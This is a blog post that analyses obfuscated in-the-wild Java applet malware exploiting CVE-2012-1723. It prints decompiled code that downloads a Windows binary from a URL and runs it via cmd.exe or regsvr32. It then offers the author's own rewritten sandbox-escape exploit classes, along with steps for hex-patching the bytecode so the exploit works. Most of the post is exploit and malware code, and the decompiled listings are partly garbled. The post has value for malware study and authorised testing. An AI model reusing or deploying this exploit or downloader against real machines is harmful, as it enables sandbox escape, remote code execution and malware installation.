Last year’s Java exploit – CVE-2012-1723

One of my many hobbies is looking into exploits others write. As I used to do some development in Java, I have been collecting actual java exploit being used in the wild. While this is nothing really new, I don’t see many examples of actual obfuscated malware online, so I figured I’d post an example.

I use a dedicated (and likely very much infected) machine to hunt for infected sites. All packets going in and out of my network are dumped in pcap files, so it was simple enough to extract the packets containing the malicious JAR file.

I used Java Decompiler – GUI to extract the actual (obfuscated) java code. Below is an example of one I looked into a few weeks ago.

[tabs style="1"] [tab title="imagegal"]

import java.applet.Applet;

public class imagegal extends Applet
  static String par;
  static int type;
  static int type2;

  public void start()
      FuckKAsp11111 localFuckKAsp11111 = new FuckKAsp11111();
      type = 0;
      type2 = 0;
        type = Integer.parseInt(VasgfrawE.get_par_arr[0]);
        String str1 = "____________9999999999999999999999999999";
        type2 = Integer.parseInt(VasgfrawE.get_par_arr[1]); 
      catch (Exception localException) 
      par = getParameter(VasgfrawE.get_par_arr[2]);
      String str2 = "____________9999999999999999999999999999";
    catch (Throwable localThrowable)

[/tab] [tab title="F"]

import java.applet.Applet;
import java.util.concurrent.TimeUnit;

public class FuckKAsp11111 extends Applet
  static String str = ".io.tmpdir";
  static ZuyuyuyuZ ldr;

  public void GEWfgwr4wfefwef()
    XLR localXLR = new XLR();
    for (int i = 0; i < 100000; i++) {
      localXLR.dsvfdbgrterwes(null, null, null);
      String str1 = "____________9999999999999999999999999999";
    catch (InterruptedException localInterruptedException) 
    String str2 = "____________9999999999999999999999999999";
    ldr = localXLR.dsvfdbgrterwes(null, getClass().getClassLoader(), null);
    String str3 = "____________9999999999999999999999999999";

  public static void fbgrthegrDSF(String paramString1, 
      String paramString2, String paramString3, int paramInt)
      byte[] arrayOfByte = new byte[512];
      String str1 = "____________9999999999999999999999999999";
      String str2 = "____________9999999999999999999999999999";
      String str3 = qDSJHFJHSDFGDSIKFJHD.gr4rgrgsfg(paramString1.length(), 
      String str4 = "";
      String str5 = "____________9999999999999999999999999999";
      String str6 = "____________9999999999999999999999999999";
      URL localURL = new URL(str3 + paramString3);
      String str7 = "____________9999999999999999999999999999";
      String str8 = str4 + paramString2 + qDSJHFJHSDFGDSIKFJHD.fna + 
      String str9 = "____________9999999999999999999999999999";
      s787654678DDD.dsvseafwvv(s787654678DDD.SiJI, localURL, 
            arrayOfByte, str8, paramInt);
    catch (Exception localException)

[/tab] [tab title="f"]


public class fYGVBJHGHJH666
  public static void vsfberwe(String paramString)
    throws Exception
    Certificate[] arrayOfCertificate = new Certificate[0];
    String str1 = "____________9999999999999999999999999999";

    URL localURL = new URL(paramString);
    Tdsfdbte54.bgnhtyrthe(localURL, arrayOfCertificate);
    String str2 = "____________9999999999999999999999999999";

[/tab] [tab title="a"]


public class aJHJKHGYJVHKKJ
  implements PrivilegedExceptionAction
  String PTROTODIR = "";
  String StrJava = "ja";

    try {
    catch (Exception localException) {

  public Object run() {
    try {
      String str1 = "____________9999999999999999999999999999";
      FuckKAsp11111.fbgrthegrDSF(imagegal.par, "1", "", imagegal.type);
      String str2 = "____________9999999999999999999999999999";
      FuckKAsp11111.fbgrthegrDSF(imagegal.par, "2", "/2", imagegal.type2);
      String str3 = "____________9999999999999999999999999999";
    } catch (Exception localException) {
    return null;

  public void test() throws Exception {
    String str = "____________9999999999999999999999999999";

[/tab] [tab title="q"]

import java.lang.reflect.Method;

public class qDSJHFJHSDFGDSIKFJHD extends Tdsfdbte54
  static ClassLoader A;
  static String s1 = 
  static String s2 = 
  ZuyuyuyuZ Perdinya71;
  ZuyuyuyuZ Perdinya72;
  ZuyuyuyuZ Perdinya73;
  ZuyuyuyuZ Perdinya74;
  ZuyuyuyuZ Perdinya75;
  ZuyuyuyuZ Perdinya76;
  ZuyuyuyuZ Perdinya77;
  ZuyuyuyuZ Perdinya78;
  ZuyuyuyuZ Perdinya79;
  ZuyuyuyuZ Perdinya80;
  ZuyuyuyuZ Perdinya81;
  ZuyuyuyuZ Perdinya82;
  ZuyuyuyuZ Perdinya83;
  ZuyuyuyuZ Perdinya84;
  ZuyuyuyuZ Perdinya85;
  ZuyuyuyuZ Perdinya86;
  ZuyuyuyuZ Perdinya87;
  ZuyuyuyuZ Perdinya88;
  ZuyuyuyuZ Perdinya89;
  ZuyuyuyuZ Perdinya90;
  static String a63 = "____________9999999999999999999999999999";
  ZuyuyuyuZ Perdinya91;
  ZuyuyuyuZ Perdinya92;
  ZuyuyuyuZ Perdinya93;
  ZuyuyuyuZ Perdinya94;
  ZuyuyuyuZ Perdinya95;
  ZuyuyuyuZ Perdinya96;
  ZuyuyuyuZ Perdinya97;
  ZuyuyuyuZ Perdinya98;
  ZuyuyuyuZ Perdinya99;
  ZuyuyuyuZ Perdinya100;
  static String fna = "SKKKKKKK.";
  static String xxx = "toString";

  public static String JMGGGGGGGGJMJ(String paramString1, String paramString2)
    String str1 = "____________9999999999999999999999999999";
    paramString2 = System.getProperty(paramString1 + FuckKAsp11111.str);
    String str2 = "____________9999999999999999999999999999";
    return paramString2;

  public static String gr4rgrgsfg(int paramInt, String paramString1, 
      String paramString2, String paramString3)
    String str1 = "";
    try {
      for (int i = 0; i < paramInt; i++) {
        str2 = paramString1.substring(i, i + 1);
        int j = paramString2.indexOf(str2);
        if (j > -1)
          String str3 = "44rst4t44rst4t44rst";
          StringBuilder localStringBuilder = new StringBuilder().append(
            str1).append(paramString3.substring(j, j + 1));
          str1 = (String)localStringBuilder.getClass().getMethod(
            xxx, null).invoke(localStringBuilder, new Object[0]);
          String str4 = "44rst4t44rst4t44rst";
    } catch (Exception localException) {
      String str2 = "44rst4t44rst4t44rst";
    return str1;

[/tab] [tab title="s"]


public class s787654678DDD
  static String[] Filetupe = { "exe", "dll" };

  static String SiJI = "java";

  static void dssss333(URL paramURL) throws Exception 
    String str1 = "____________9999999999999999999999999999";
    String str2 = "____________9999999999999999999999999999"; }

  public static void dsvseafwvv(String paramString1, URL paramURL, 
      byte[] paramArrayOfByte, String paramString2, int paramInt)
      String str1 = "____________9999999999999999999999999999";
      InputStream localInputStream = paramURL.openStream();
      FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
      String str2 = "____________9999999999999999999999999999";
      String str3 = "____________9999999999999999999999999999";
      VasgfrawE.sfbergwea43543534(localInputStream, paramArrayOfByte, 
            localFileOutputStream, paramString2, paramInt);
    catch (Exception localException)

  static void asgtergw33(String paramString, 
      int paramInt1, int paramInt2) throws Exception 
    Runtime localRuntime = Runtime.getRuntime();
    if (paramInt2 > 1) {
      String str1 = "____________9999999999999999999999999999";
      if (paramInt1 == 0) {
        localRuntime.exec(ZuyuyuyuZ.cmd[0] + paramString);
      String str2 = "____________9999999999999999999999999999";
      if (paramInt1 == 1) {
        String str3 = "____________9999999999999999999999999999";
        localRuntime.exec(ZuyuyuyuZ.cmd[1] + paramString);
        String str4 = "____________9999999999999999999999999999";
        String str5 = "____________9999999999999999999999999999";

[/tab] [tab title="T"]


public class Tdsfdbte54
  static CodeSource fd;
  static String a2 = "____________9999999999999999999999999999";
  static String sasfi = "file:///";
  ZuyuyuyuZ Perdinya1;
  ZuyuyuyuZ Perdinya2;
  ZuyuyuyuZ Perdinya3;
  ZuyuyuyuZ Perdinya4;
  ZuyuyuyuZ Perdinya5;
  ZuyuyuyuZ Perdinya6;
  ZuyuyuyuZ Perdinya7;
  ZuyuyuyuZ Perdinya8;
  ZuyuyuyuZ Perdinya9;
  ZuyuyuyuZ Perdinya10;
  ZuyuyuyuZ Perdinya11;
  ZuyuyuyuZ Perdinya12;
  ZuyuyuyuZ Perdinya13;
  ZuyuyuyuZ Perdinya14;
  ZuyuyuyuZ Perdinya15;
  ZuyuyuyuZ Perdinya16;
  ZuyuyuyuZ Perdinya17;
  ZuyuyuyuZ Perdinya18;
  ZuyuyuyuZ Perdinya19;
  ZuyuyuyuZ Perdinya20;
  ZuyuyuyuZ Perdinya21;
  ZuyuyuyuZ Perdinya22;
  ZuyuyuyuZ Perdinya23;
  ZuyuyuyuZ Perdinya24;
  ZuyuyuyuZ Perdinya25;
  ZuyuyuyuZ Perdinya26;
  ZuyuyuyuZ Perdinya27;
  ZuyuyuyuZ Perdinya28;
  ZuyuyuyuZ Perdinya29;
  ZuyuyuyuZ Perdinya30;
  static String a7 = "____________9999999999999999999999999999";
  ZuyuyuyuZ Perdinya31;
  ZuyuyuyuZ Perdinya32;
  ZuyuyuyuZ Perdinya33;
  ZuyuyuyuZ Perdinya34;
  ZuyuyuyuZ Perdinya35;
  ZuyuyuyuZ Perdinya36;
  ZuyuyuyuZ Perdinya37;
  ZuyuyuyuZ Perdinya38;
  ZuyuyuyuZ Perdinya39;
  ZuyuyuyuZ Perdinya40;
  ZuyuyuyuZ Perdinya41;
  ZuyuyuyuZ Perdinya42;
  ZuyuyuyuZ Perdinya43;
  ZuyuyuyuZ Perdinya44;
  ZuyuyuyuZ Perdinya45;
  ZuyuyuyuZ Perdinya46;
  ZuyuyuyuZ Perdinya47;
  ZuyuyuyuZ Perdinya48;
  ZuyuyuyuZ Perdinya49;
  ZuyuyuyuZ Perdinya50;
  ZuyuyuyuZ Perdinya51;
  ZuyuyuyuZ Perdinya52;
  ZuyuyuyuZ Perdinya53;
  ZuyuyuyuZ Perdinya54;
  ZuyuyuyuZ Perdinya55;
  ZuyuyuyuZ Perdinya56;
  ZuyuyuyuZ Perdinya57;
  ZuyuyuyuZ Perdinya58;
  ZuyuyuyuZ Perdinya59;
  ZuyuyuyuZ Perdinya60;
  ZuyuyuyuZ Perdinya61;
  ZuyuyuyuZ Perdinya62;
  ZuyuyuyuZ Perdinya63;
  ZuyuyuyuZ Perdinya64;
  ZuyuyuyuZ Perdinya65;
  ZuyuyuyuZ Perdinya66;
  ZuyuyuyuZ Perdinya67;
  ZuyuyuyuZ Perdinya68;
  ZuyuyuyuZ Perdinya69;
  ZuyuyuyuZ Perdinya70;
  static Permissions cenb;

  public static void bgnhtyrthe(URL paramURL, Certificate[] paramArrayOfCertificate)
    throws Exception
    cenb = new Permissions();
    cenb.add(new AllPermission());
    String str = "____________9999999999999999999999999999";
    CodeSource localCodeSource = new CodeSource(paramURL, paramArrayOfCertificate);

[/tab] [tab title="V"]


public class VasgfrawE
  static String[] get_par_arr = { "t", "tt", "ur0l0" };
  static String asdas = "aJHJKHGYJVHKKJ";

  public static void sfbergwea43543534(InputStream paramInputStream, 
      byte[] paramArrayOfByte, FileOutputStream paramFileOutputStream, 
      String paramString, int paramInt) 
      String str1 = "____________9999999999999999999999999999";
      int j = 0;
      int i;
      while ((i =, 0, 
          paramArrayOfByte.length)) != -1) 
        paramFileOutputStream.write(paramArrayOfByte, 0, i);
        str2 = "____________9999999999999999999999999999";
      String str2 = "____________9999999999999999999999999999";
      s787654678DDD.asgtergw33(paramString, paramInt, j); 
    catch (Exception localException) 

  public static ProtectionDomain sdd2231sasd() throws Exception 
    String str = "____________9999999999999999999999999999";
    return new ProtectionDomain(Tdsfdbte54.fd, Tdsfdbte54.cenb);

[/tab] [tab title="X"]

public class XLR extends qDSJHFJHSDFGDSIKFJHD
  ZuyuyuyuZ dsvfdbgrterwes(Object paramObject1, 
      ClassLoader paramClassLoader, Object paramObject2)
    String str1 = "____________9999999999999999999999999999";
    A = (ZuyuyuyuZ)paramObject2;
    String str2;
    String str3;
    if (paramClassLoader != paramObject1)
      str2 = "____________9999999999999999999999999999";
      str3 = "____________9999999999999999999999999999";
      str2 = "____________9999999999999999999999999999";
      str3 = "____________9999999999999999999999999999";
      return null;
    this.A = paramClassLoader;
    return SS_RR_SS0(paramObject1);

  ZuyuyuyuZ SS_RR_SS0(Object paramObject)
    if (paramObject != this.Perdinya1) return this.Perdinya1;
    if (paramObject != this.Perdinya2) return this.Perdinya2;
    if (paramObject != this.Perdinya3) return this.Perdinya3;
    if (paramObject != this.Perdinya4) return this.Perdinya4;
    if (paramObject != this.Perdinya5) return this.Perdinya5;
    if (paramObject != this.Perdinya6) return this.Perdinya6;
    String str1 = "____________9999999999999999999999999999";
    if (paramObject != this.Perdinya7) return this.Perdinya7;
    if (paramObject != this.Perdinya8) return this.Perdinya8;
    String str2 = "____________9999999999999999999999999999";
    if (paramObject != this.Perdinya9) return this.Perdinya9;
    if (paramObject != this.Perdinya10) return this.Perdinya10;
    return SS_RR_SS(paramObject);

  ZuyuyuyuZ SS_RR_SS(Object paramObject) {
    if (paramObject != this.Perdinya11) return this.Perdinya11;
    if (paramObject != this.Perdinya12) return this.Perdinya12;
    if (paramObject != this.Perdinya13) return this.Perdinya13;

    if (paramObject != this.Perdinya14) return this.Perdinya14;
    if (paramObject != this.Perdinya15) return this.Perdinya15;
    if (paramObject != this.Perdinya16) return this.Perdinya16;

    if (paramObject != this.Perdinya17) return this.Perdinya17;
    if (paramObject != this.Perdinya18) return this.Perdinya18;
    if (paramObject != this.Perdinya19) return this.Perdinya19;
    if (paramObject != this.Perdinya20) return this.Perdinya20;

    return SS_RR_SS1(paramObject);
  ZuyuyuyuZ SS_RR_SS1(Object paramObject) {
    if (paramObject != this.Perdinya21) return this.Perdinya21;
    if (paramObject != this.Perdinya22) return this.Perdinya22;
    if (paramObject != this.Perdinya23) return this.Perdinya23;
    if (paramObject != this.Perdinya24) return this.Perdinya24;

    if (paramObject != this.Perdinya25) return this.Perdinya25;
    if (paramObject != this.Perdinya26) return this.Perdinya26;
    if (paramObject != this.Perdinya27) return this.Perdinya27;
    if (paramObject != this.Perdinya28) return this.Perdinya28;
    if (paramObject != this.Perdinya29) return this.Perdinya29;
    if (paramObject != this.Perdinya30) return this.Perdinya30;

    return SS_RR_SS2(paramObject);
  ZuyuyuyuZ SS_RR_SS2(Object paramObject) {
    if (paramObject != this.Perdinya31) return this.Perdinya31;
    if (paramObject != this.Perdinya32) return this.Perdinya32;
    if (paramObject != this.Perdinya33) return this.Perdinya33;

    if (paramObject != this.Perdinya34) return this.Perdinya34;
    if (paramObject != this.Perdinya35) return this.Perdinya35;
    if (paramObject != this.Perdinya36) return this.Perdinya36;
    if (paramObject != this.Perdinya37) return this.Perdinya37;

    if (paramObject != this.Perdinya38) return this.Perdinya38;
    if (paramObject != this.Perdinya39) return this.Perdinya39;
    if (paramObject != this.Perdinya40) return this.Perdinya40;

    return SS_RR_SS3(paramObject);

  ZuyuyuyuZ SS_RR_SS3(Object paramObject) {
    if (paramObject != this.Perdinya41) return this.Perdinya41;
    if (paramObject != this.Perdinya42) return this.Perdinya42;
    if (paramObject != this.Perdinya43) return this.Perdinya43;
    if (paramObject != this.Perdinya44) return this.Perdinya44;
    if (paramObject != this.Perdinya45) return this.Perdinya45;

    if (paramObject != this.Perdinya46) return this.Perdinya46;
    if (paramObject != this.Perdinya47) return this.Perdinya47;
    if (paramObject != this.Perdinya48) return this.Perdinya48;

    if (paramObject != this.Perdinya49) return this.Perdinya49;
    if (paramObject != this.Perdinya50) return this.Perdinya50;
    return SS_RR_SS4(paramObject);

  ZuyuyuyuZ SS_RR_SS4(Object paramObject)
    if (paramObject != this.Perdinya51) return this.Perdinya51;
    if (paramObject != this.Perdinya52) return this.Perdinya52;
    if (paramObject != this.Perdinya53) return this.Perdinya53;
    if (paramObject != this.Perdinya54) return this.Perdinya54;

    if (paramObject != this.Perdinya55) return this.Perdinya55;
    if (paramObject != this.Perdinya56) return this.Perdinya56;
    if (paramObject != this.Perdinya57) return this.Perdinya57;
    if (paramObject != this.Perdinya58) return this.Perdinya58;
    if (paramObject != this.Perdinya59) return this.Perdinya59;
    if (paramObject != this.Perdinya60) return this.Perdinya60;

    return SS_RR_SS5(paramObject);

  ZuyuyuyuZ SS_RR_SS5(Object paramObject)
    if (paramObject != this.Perdinya61) return this.Perdinya61;
    if (paramObject != this.Perdinya62) return this.Perdinya62;
    if (paramObject != this.Perdinya63) return this.Perdinya63;
    if (paramObject != this.Perdinya64) return this.Perdinya64;

    return SS_RR_SS6(paramObject);

  ZuyuyuyuZ SS_RR_SS6(Object paramObject) {
    if (paramObject != this.Perdinya65) return this.Perdinya65;
    if (paramObject != this.Perdinya66) return this.Perdinya66;
    if (paramObject != this.Perdinya67) return this.Perdinya67;
    if (paramObject != this.Perdinya68) return this.Perdinya68;
    if (paramObject != this.Perdinya69) return this.Perdinya69;

    return SS_RR_SS7(paramObject);
  ZuyuyuyuZ SS_RR_SS7(Object paramObject) {
    if (paramObject != this.Perdinya70) return this.Perdinya70;
    if (paramObject != this.Perdinya71) return this.Perdinya71;
    if (paramObject != this.Perdinya72) return this.Perdinya72;
    if (paramObject != this.Perdinya73) return this.Perdinya73;
    if (paramObject != this.Perdinya74) return this.Perdinya74;

    return SS_RR_SS8(paramObject);
  ZuyuyuyuZ SS_RR_SS8(Object paramObject) {
    if (paramObject != this.Perdinya75) return this.Perdinya75;
    if (paramObject != this.Perdinya76) return this.Perdinya76;
    if (paramObject != this.Perdinya77) return this.Perdinya77;
    if (paramObject != this.Perdinya78) return this.Perdinya78;
    if (paramObject != this.Perdinya79) return this.Perdinya79;
    if (paramObject != this.Perdinya80) return this.Perdinya80;

    return SS_RR_SS9(paramObject);
  ZuyuyuyuZ SS_RR_SS9(Object paramObject) {
    if (paramObject != this.Perdinya81) return this.Perdinya81;
    if (paramObject != this.Perdinya82) return this.Perdinya82;
    if (paramObject != this.Perdinya83) return this.Perdinya83;

    return SS_RR_SS10(paramObject);
  ZuyuyuyuZ SS_RR_SS10(Object paramObject) {
    if (paramObject != this.Perdinya84) return this.Perdinya84;
    if (paramObject != this.Perdinya85) return this.Perdinya85;
    if (paramObject != this.Perdinya86) return this.Perdinya86;
    if (paramObject != this.Perdinya87) return this.Perdinya87;

    return SS_RR_SS11(paramObject);
  ZuyuyuyuZ SS_RR_SS11(Object paramObject) {
    if (paramObject != this.Perdinya88) return this.Perdinya88;
    if (paramObject != this.Perdinya89) return this.Perdinya89;
    if (paramObject != this.Perdinya90) return this.Perdinya90;
    if (paramObject != this.Perdinya91) return this.Perdinya91;
    if (paramObject != this.Perdinya92) return this.Perdinya92;

    return SS_RR_SS12(paramObject);
  ZuyuyuyuZ SS_RR_SS12(Object paramObject) {
    if (paramObject != this.Perdinya93) return this.Perdinya93;
    if (paramObject != this.Perdinya94) return this.Perdinya94;
    if (paramObject != this.Perdinya95) return this.Perdinya95;

    return SS_RR_SS13(paramObject);
  ZuyuyuyuZ SS_RR_SS13(Object paramObject) {
    if (paramObject != this.Perdinya96) return this.Perdinya96;
    if (paramObject != this.Perdinya97) return this.Perdinya97;

    return SS_RR_SS14(paramObject);
  ZuyuyuyuZ SS_RR_SS14(Object paramObject) {
    if (paramObject != this.Perdinya98) return this.Perdinya98;
    if (paramObject != this.Perdinya99) return this.Perdinya99;
    if (paramObject != this.Perdinya100) return this.Perdinya100;
    return SS_RR_SS15(paramObject);

  ZuyuyuyuZ SS_RR_SS15(Object paramObject) {
    return null;

[/tab] [tab title="Z"]


public class ZuyuyuyuZ extends ClassLoader
  static String[] cmd = { "cmd.exe ASDQEW".replace("ASDQEW", "/C start "), 
      "regsEWWER".replace("EWWER", "vr32.exe /s ") };

  public static void frwgtehg4wre()
      String str1 = "____________9999999999999999999999999999";
      InputStream localInputStream = FuckKAsp11111.ldr.getResourceAsStream(
        VasgfrawE.asdas + ".class");
      int i = localInputStream.available();
      String str2 = "____________9999999999999999999999999999";
      byte[] arrayOfByte = new byte[i];
      String str3 = "____________9999999999999999999999999999";, 0, i);
      String str4 = "____________9999999999999999999999999999";
      ProtectionDomain localProtectionDomain = VasgfrawE.sdd2231sasd();
      Class localClass = FuckKAsp11111.ldr.defineClass(VasgfrawE.asdas, 
            arrayOfByte, 0, arrayOfByte.length, localProtectionDomain);
      String str5 = "____________9999999999999999999999999999";
      aJHJKHGYJVHKKJ localaJHJKHGYJVHKKJ = (aJHJKHGYJVHKKJ)localClass.newInstance();
    catch (Exception localException)

[/tab] [/tabs]

While I did some minor format changes and reduced the length of the trash variables (the underscores went on forever), what you see there is essentially the source code of the exploit.

After spending time manually deobfuscating the above, some key points:

  • Main entry point is It doesnt do much of interest other than calling FuckKAsp11111
  • Tdsfdbte54 has a large number of instances of the class ZuyuyuyuZ (extends ClassLoader), and is further extended by qDSJHFJHSDFGDSIKFJHD, which adds even more ZuyuyuyuZ instances, for a total of 100 ZuyuyuyuZ objects. qDSJHFJHSDFGDSIKFJHD also has a static ClassLoader named A.
  • XLR has a method that takes in a ClassLoader object as a parameter, and returns ZuyuyuyuZ (which again, extends ClassLoader). This method returns null if the parameter is null, and otherwise, assigns a value to this.A (remember that A is static). It then loops through all the 100 ZuyuyuyuZ objects, looking for one that isnt null, and returns that non-null object.
  • The FuckKAsp11111 class contains a for loop that loops around 100,000 times, calling the above XLR function. NULL is passed in as the parameter, so null is returned each of those 100,000 times. It then waits 10 milliseconds. Then it calls the same function a last time, passing in an actual ClassLoader object. It was this function that made it easy to identify the java vulnerability. The 100,000 iterations will null parameters, followed by one call with a non-null parameter, led to a type confusion exploit. Instead of returning NULL like it should, as none of the ZuyuyuyuZ have been instantiated, an actual ClassLoader object gets returned.
  • aJHJKHGYJVHKKJ and s787654678DDD together contain the code that breaks the applet's security (System.setSecurityManager(null)), downloads and executes a windows binary.

Based on the above information, the exploit can be identified as CVE-2012-1723.
A good write up from Symantec is here.
Another great write up (by Michael 'mihi' Schierl), one that this code essentially follows exactly (minus the obfuscation), is here.

As this is a fairly old vulnerability, a Metasploit module already exists (exploit/multi/browser/java_verifier_field_access). Still, I was bored, so I wrote my own code for this exploit, which is always nice to have for pentesting.

Note: I'm only including my code as this vulnerability has been out for a while, has a Metasploit module, and is already exploited by 'bad guys'. Still, remember to only use this on machines you're authorized to exploit, anything else is illegal!

[tabs] [tab title="javaBreakSandbox"]

import java.applet.Applet;
import java.util.concurrent.TimeUnit;

public class javaBreakSandbox extends Applet
  static myClassLoader C;

  public void start()
      spill s = new spill();
      for(int i = 0; i < 100000; i++)
        s.confuse(null, null, null);


      C = s.confuse(null, getClass().getClassLoader(), null);
    catch (Throwable localThrowable)

[/tab] [tab title="myClassLoader"]


public class myClassLoader extends ClassLoader
   public static void breakSandbox()
         InputStream localInputStream = javaBreakSandbox.C.
         int i = localInputStream.available();
         byte[] arrayOfByte = new byte[i];, 0, i);
         String urlString = "file:///";
         Certificate[] arrayOfCertificate = new Certificate[0];
         URL localURL = new URL(urlString);
         CodeSource cs = new CodeSource(localURL, arrayOfCertificate);
         Permissions perm = new Permissions();
         perm.add(new AllPermission());
         ProtectionDomain localProtectionDomain = new ProtectionDomain(cs, perm);
         Class localClass = javaBreakSandbox.C.defineClass("exploit", 
             arrayOfByte, 0, arrayOfByte.length,localProtectionDomain);
         exploit localExploit = (exploit)localClass.newInstance(); 
      catch(Exception localException)
         System.out.println("myClassLoader break: " + localException);

[/tab] [tab title="spill"]

public class spill
   static ClassLoader A;
   myClassLoader B1;
   myClassLoader B2;
   myClassLoader B3;
   myClassLoader B4;
   myClassLoader B5;
   myClassLoader B6;
   myClassLoader B7;
   myClassLoader B8;
   myClassLoader B9;
   myClassLoader B10;
   myClassLoader B11;
   myClassLoader B12;
   myClassLoader B13;
   myClassLoader B14;
   myClassLoader B15;
   myClassLoader B16;
   myClassLoader B17;
   myClassLoader B18;
   myClassLoader B19;
   myClassLoader B20;
   myClassLoader B21;
   myClassLoader B22;
   myClassLoader B23;
   myClassLoader B24;
   myClassLoader B25;
   myClassLoader B26;
   myClassLoader B27;
   myClassLoader B28;
   myClassLoader B29;
   myClassLoader B30;
   myClassLoader B31;
   myClassLoader B32;
   myClassLoader B33;
   myClassLoader B34;
   myClassLoader B35;
   myClassLoader B36;
   myClassLoader B37;
   myClassLoader B38;
   myClassLoader B39;
   myClassLoader B40;
   myClassLoader B41;
   myClassLoader B42;
   myClassLoader B43;
   myClassLoader B44;
   myClassLoader B45;
   myClassLoader B46;
   myClassLoader B47;
   myClassLoader B48;
   myClassLoader B49;
   myClassLoader B50;
   myClassLoader B51;
   myClassLoader B52;
   myClassLoader B53;
   myClassLoader B54;
   myClassLoader B55;
   myClassLoader B56;
   myClassLoader B57;
   myClassLoader B58;
   myClassLoader B59;
   myClassLoader B60;
   myClassLoader B61;
   myClassLoader B62;
   myClassLoader B63;
   myClassLoader B64;
   myClassLoader B65;
   myClassLoader B66;
   myClassLoader B67;
   myClassLoader B68;
   myClassLoader B69;
   myClassLoader B70;
   myClassLoader B71;
   myClassLoader B72;
   myClassLoader B73;
   myClassLoader B74;
   myClassLoader B75;
   myClassLoader B76;
   myClassLoader B77;
   myClassLoader B78;
   myClassLoader B79;
   myClassLoader B80;
   myClassLoader B81;
   myClassLoader B82;
   myClassLoader B83;
   myClassLoader B84;
   myClassLoader B85;
   myClassLoader B86;
   myClassLoader B87;
   myClassLoader B88;
   myClassLoader B89;
   myClassLoader B90;
   myClassLoader B91;
   myClassLoader B92;
   myClassLoader B93;
   myClassLoader B94;
   myClassLoader B95;
   myClassLoader B96;
   myClassLoader B97;
   myClassLoader B98;
   myClassLoader B99;
   myClassLoader B100;

   public myClassLoader confuse(Object _C, ClassLoader _A, Object _B)
      A = (myClassLoader)_B;
      if(_A == _B)
         return null;
      this.A = _A;
      if(this.B1 != null) return this.B1;
      if(this.B2 != null) return this.B2;
      if(this.B3 != null) return this.B3;
      if(this.B4 != null) return this.B4;
      if(this.B5 != null) return this.B5;
      if(this.B6 != null) return this.B6;
      if(this.B7 != null) return this.B7;
      if(this.B8 != null) return this.B8;
      if(this.B9 != null) return this.B9;
      if(this.B10 != null) return this.B10;
      if(this.B11 != null) return this.B11;
      if(this.B12 != null) return this.B12;
      if(this.B13 != null) return this.B13;
      if(this.B14 != null) return this.B14;
      if(this.B15 != null) return this.B15;
      if(this.B16 != null) return this.B16;
      if(this.B17 != null) return this.B17;
      if(this.B18 != null) return this.B18;
      if(this.B19 != null) return this.B19;
      if(this.B20 != null) return this.B20;
      if(this.B21 != null) return this.B21;
      if(this.B22 != null) return this.B22;
      if(this.B23 != null) return this.B23;
      if(this.B24 != null) return this.B24;
      if(this.B25 != null) return this.B25;
      if(this.B26 != null) return this.B26;
      if(this.B27 != null) return this.B27;
      if(this.B28 != null) return this.B28;
      if(this.B29 != null) return this.B29;
      if(this.B30 != null) return this.B30;
      if(this.B31 != null) return this.B31;
      if(this.B32 != null) return this.B32;
      if(this.B33 != null) return this.B33;
      if(this.B34 != null) return this.B34;
      if(this.B35 != null) return this.B35;
      if(this.B36 != null) return this.B36;
      if(this.B37 != null) return this.B37;
      if(this.B38 != null) return this.B38;
      if(this.B39 != null) return this.B39;
      if(this.B40 != null) return this.B40;
      if(this.B41 != null) return this.B41;
      if(this.B42 != null) return this.B42;
      if(this.B43 != null) return this.B43;
      if(this.B44 != null) return this.B44;
      if(this.B45 != null) return this.B45;
      if(this.B46 != null) return this.B46;
      if(this.B47 != null) return this.B47;
      if(this.B48 != null) return this.B48;
      if(this.B49 != null) return this.B49;
      if(this.B50 != null) return this.B50;
      if(this.B51 != null) return this.B51;
      if(this.B52 != null) return this.B52;
      if(this.B53 != null) return this.B53;
      if(this.B54 != null) return this.B54;
      if(this.B55 != null) return this.B55;
      if(this.B56 != null) return this.B56;
      if(this.B57 != null) return this.B57;
      if(this.B58 != null) return this.B58;
      if(this.B59 != null) return this.B59;
      if(this.B60 != null) return this.B60;
      if(this.B61 != null) return this.B61;
      if(this.B62 != null) return this.B62;
      if(this.B63 != null) return this.B63;
      if(this.B64 != null) return this.B64;
      if(this.B65 != null) return this.B65;
      if(this.B66 != null) return this.B66;
      if(this.B67 != null) return this.B67;
      if(this.B68 != null) return this.B68;
      if(this.B69 != null) return this.B69;
      if(this.B70 != null) return this.B70;
      if(this.B71 != null) return this.B71;
      if(this.B72 != null) return this.B72;
      if(this.B73 != null) return this.B73;
      if(this.B74 != null) return this.B74;
      if(this.B75 != null) return this.B75;
      if(this.B76 != null) return this.B76;
      if(this.B77 != null) return this.B77;
      if(this.B78 != null) return this.B78;
      if(this.B79 != null) return this.B79;
      if(this.B80 != null) return this.B80;
      if(this.B81 != null) return this.B81;
      if(this.B82 != null) return this.B82;
      if(this.B83 != null) return this.B83;
      if(this.B84 != null) return this.B84;
      if(this.B85 != null) return this.B85;
      if(this.B86 != null) return this.B86;
      if(this.B87 != null) return this.B87;
      if(this.B88 != null) return this.B88;
      if(this.B89 != null) return this.B89;
      if(this.B90 != null) return this.B90;
      if(this.B91 != null) return this.B91;
      if(this.B92 != null) return this.B92;
      if(this.B93 != null) return this.B93;
      if(this.B94 != null) return this.B94;
      if(this.B95 != null) return this.B95;
      if(this.B96 != null) return this.B96;
      if(this.B97 != null) return this.B97;
      if(this.B98 != null) return this.B98;
      if(this.B99 != null) return this.B99;
      if(this.B100 != null) return this.B100;
      return null;

[/tab] [tab title="exploit"]


public class exploit implements PrivilegedExceptionAction
   public exploit()
      catch(Exception localException)
         System.out.println("exploit constructor: " + localException);

   public Object run() 
      catch(Exception localException)
         System.out.println("exploit run: " + localException);
      return null;

[/tab] [/tabs]

The javaBreakSandbox class is the main entry point to the applet. It manages calling the confuse method in the spill class 100000 times to confuse the JIT logic before calling the method a final time. It then calls the functions in myClassLoader to actually break out of the sandbox and run system commands (in this case just open calc.exe) from the exploit class.

It should be much simpler to follow than the original source code :)

Once compiled, the last step is fixing the bytecode, as the compiler will automatically 'fix' the potential issue (see the previously mentioned write ups). To read the bytecode, I used the built in javap command. First I took a look at the XLR.class (left) bytecode to see how that looked next to my spill.class (right) bytecode.
XLR and spill javap

The key bytecode is on line 39 in XLR (again, left), and line 17 in spill (again, right). XLR is using the putfield command, while my spill class is using the putstatic command. There is also a random pop in spill.class on line 15 that is not in the XLR bytecode.

I used a hex editor to do fix this manually, though there are other options if you take the time. If you choose to do it manually, Java bytecode instruction listings is a great resource.

